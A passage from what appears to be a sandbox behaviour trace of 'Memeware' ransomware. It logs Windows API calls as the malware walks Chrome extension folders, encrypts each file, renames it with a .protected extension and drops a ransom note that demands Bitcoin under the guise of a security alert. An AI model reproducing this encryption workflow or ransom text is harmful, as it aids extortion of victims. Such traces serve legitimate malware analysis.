(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.157] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.157] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.157] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.157] CloseHandle (hObject=0x164) returned 1 [0081.157] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.157] lstrcmpiW (lpString1="pt_PT", lpString2="Windows") returned -1 [0081.157] lstrcmpiW (lpString1="pt_PT", lpString2="Program Files") returned 1 [0081.157] lstrcmpiW (lpString1="pt_PT", lpString2="Program Files (x86)") returned 1 [0081.157] lstrcmpiW (lpString1="pt_PT", lpString2="$Recycle.bin") returned 1 [0081.157] lstrcmpiW (lpString1="pt_PT", lpString2="System Volume Information") returned -1 [0081.157] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT") returned 148 [0081.157] lstrcmpW (lpString1="pt_PT", lpString2=".") returned 1 [0081.158] lstrcmpW (lpString1="pt_PT", lpString2="..") returned 1 [0081.158] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\*") returned 150 [0081.158] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.158] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.158] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.158] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.158] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.158] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.158] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\.") returned 150 [0081.158] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.158] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.158] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.158] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.158] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.158] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.158] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.158] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\..") returned 151 [0081.158] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.158] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.158] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.158] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.158] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.158] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.158] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.158] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.158] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json") returned 162 [0081.158] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.158] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.158] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.159] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.159] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.159] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json") returned 162 [0081.159] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.159] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json") returned 162 [0081.159] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.159] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json") returned 162 [0081.159] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.159] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x295, lpOverlapped=0x0) returned 1 [0081.161] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd6b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.161] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x295, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x295, lpOverlapped=0x0) returned 1 [0081.161] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.161] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.161] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.161] CloseHandle (hObject=0x168) returned 1 [0081.161] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json.protected") returned 172 [0081.161] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_pt\\messages.json.protected")) returned 1 [0081.162] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.162] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.162] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\RESTORE_FILES.txt") returned 166 [0081.162] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_pt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.163] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.163] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.164] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.164] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.164] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.164] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.164] CloseHandle (hObject=0x164) returned 1 [0081.164] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.164] lstrcmpiW (lpString1="ro", lpString2="Windows") returned -1 [0081.164] lstrcmpiW (lpString1="ro", lpString2="Program Files") returned 1 [0081.164] lstrcmpiW (lpString1="ro", lpString2="Program Files (x86)") returned 1 [0081.165] lstrcmpiW (lpString1="ro", lpString2="$Recycle.bin") returned 1 [0081.165] lstrcmpiW (lpString1="ro", lpString2="System Volume Information") returned -1 [0081.165] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro") returned 145 [0081.165] lstrcmpW (lpString1="ro", lpString2=".") returned 1 [0081.165] lstrcmpW (lpString1="ro", lpString2="..") returned 1 [0081.165] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\*") returned 147 [0081.165] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.165] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.165] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.165] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.165] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.165] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.165] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\.") returned 147 [0081.165] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.165] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.165] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.165] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.165] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.165] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.165] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.165] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\..") returned 148 [0081.166] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.166] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.166] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.166] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.166] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.166] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.166] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.166] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.166] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json") returned 159 [0081.166] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.166] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.166] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.166] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.166] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.168] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json") returned 159 [0081.168] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.168] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json") returned 159 [0081.168] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.168] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json") returned 159 [0081.168] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.168] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x29c, lpOverlapped=0x0) returned 1 [0081.169] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd64, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.170] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x29c, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x29c, lpOverlapped=0x0) returned 1 [0081.170] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.170] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.170] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.170] CloseHandle (hObject=0x168) returned 1 [0081.170] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json.protected") returned 169 [0081.170] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json.protected")) returned 1 [0081.171] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.171] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.171] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\RESTORE_FILES.txt") returned 163 [0081.171] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.172] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.172] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.173] lstrlenA 